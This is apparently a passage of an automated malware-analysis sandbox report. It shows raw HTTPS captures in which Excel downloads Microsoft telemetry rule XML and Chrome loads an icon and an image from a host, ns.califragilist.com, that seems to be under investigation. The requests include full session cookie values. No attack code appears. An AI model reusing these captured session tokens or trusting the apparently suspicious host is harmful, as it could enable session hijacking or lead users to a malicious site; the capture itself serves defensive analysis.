                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 3f 11 ea 8c 2c 4f 00 7f d3 73 5a f8 39 a3 7b b4 fa 08 05 4b 29 9d a9 00 d4 0f d0 0a 61 74 9e d8 58 75 54 e3 b3 cf f8 5c 61 34 02 d8 67 ba c4 07 bf 34 08 01 c8 d7 33 05 25 91 75 5c 45 60 5f 3e 4e 16 4b 24 af 89 c0 de b4 43 98 59 bc 2e 78 01 fb 6e 52 4d e6 73 8f d0 0a 1e 13 04 80 55 c4 0e f2 09 70 d0 2a 2c 55 96 97 64 a2 86 58 80 fc 44 5a eb f8 14 42 e2 e5 d5 51 82 cf 35 35 64 ea b9 f6 f0 39 e1 0f 2e 6f eb e6 a4 92 c8 77 25 08 98 37 9c cf 79 83 50 9a 4f 1c a4 70 18 af cf 41 c0 01 b2 54 45 d6 27 2c fc 20 fb 2b 59 ae b0 4a 28 05 02 ae 17 aa 22 1f 2c 46 e7 31 8f f2 12 74 24 66 cb ce a6 06 92 0e 05 b1 3b 53 d9 9c 07 18 d6 a6 75 89 cf 97 c4 9e 99 d4 91 9d 4f 84 12 3e 0f 47 25 de ab e7 9c 31 7c ee fa 49 00 6d f8 38 72 1b 83 a6 7c 9e a6 64 27 ab 9d 26 09 60 bb 28
                                                                                                                                              Data Ascii: ?,OsZ9{K)atXuT\a4g43%u\E`_>NK$CY.xnRMsUp*,UdXDZBQ55d9.ow%7yPOpATE', +YJ(",F1t$f;SuO>G%1|Im8r|d'&`(


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              86192.168.2.184987413.107.246.454436516C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:05 UTC219OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                              2024-11-06 15:56:05 UTC473INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: text/plain
                                                                                                                                              Content-Length: 1112622
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Cache-Control: public
                                                                                                                                              Last-Modified: Tue, 05 Nov 2024 17:40:36 GMT
                                                                                                                                              ETag: "0x8DCFDC0F50516B2"
                                                                                                                                              x-ms-request-id: 09ece728-101e-00a2-6964-309f2e000000
                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                              x-azure-ref: 20241106T155605Z-16547b76f7f9bs6dhC1DFWt3rg00000006x0000000003hk1
                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                              X-Cache: TCP_MISS
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:56:05 UTC15911INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                                                                                                                              Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                                                                                                                              2024-11-06 15:56:05 UTC16384INData Raw: 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a
                                                                                                                                              Data Ascii: $!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32" I="1" O="false">
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a
                                                                                                                                              Data Ascii: <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32" I="0" O="false">
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53
                                                                                                                                              Data Ascii: <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <L> <S
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                              Data Ascii: "FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T="28" /> </C>
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d 34 33 63 39 2d 62 61 34 63 2d 39 35 32 65 65 31 33 30 35 34
                                                                                                                                              Data Ascii: Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-43c9-ba4c-952ee13054
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 20 4e
                                                                                                                                              Data Ascii: /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U64" I="0" O="true" N
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 37 38 35 32 22 20 54 3d 22 49 33 32 22 20 2f 3e
                                                                                                                                              Data Ascii: ="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V V="27852" T="I32" />
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                                                                                                                              Data Ascii: <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException"> <C> <S T
                                                                                                                                              2024-11-06 15:56:06 UTC16384INData Raw: 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                              Data Ascii: F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L> <S T="


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              87192.168.2.1849875188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:05 UTC1116OUTGET /mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1048INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y6fMRWfukNc65xiBVwmKZG9S96WFB4rKLfIyZXGIIBr5IwLZISVNvdnossOQa01YXattzpFaxg1QFcC0CFNzcM2Gz2shthM7E0PjuDhGDxxlTTgGFf%2BCZ7LH6mDc%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3458&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2038&delivery_rate=816694&cwnd=251&unsent_bytes=0&cid=4778a136e39f8428&ts=79&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645854c00ddaf-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1189&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1694&delivery_rate=2407315&cwnd=32&unsent_bytes=0&cid=4b31847c0678ae0d&ts=493&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                                                                              Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                                                                              2024-11-06 15:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              88192.168.2.1849876188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:05 UTC1383OUTGET /qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1039INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 9648
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHmiEMAjdYi1iqXI2VgbTQDrL9swB0g8LikMDvbw%2B92T5m4ppyhJfjGImRgKO7h0uDinC13IT0%2Fl2sw0fT2XZ64iC1visjXGn1uInhCPjUoJZql%2FzRagkq6TbclUDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3370&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2302&delivery_rate=830275&cwnd=251&unsent_bytes=0&cid=e3cefcbccbf35a22&ts=80&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645856f82e759-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18793&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1961&delivery_rate=154610&cwnd=32&unsent_bytes=0&cid=e5239878dad16589&ts=379&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC330INData Raw: 52 49 46 46 a8 25 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 f9 01 00 2e 01 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFF%WEBPVP8X0.ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
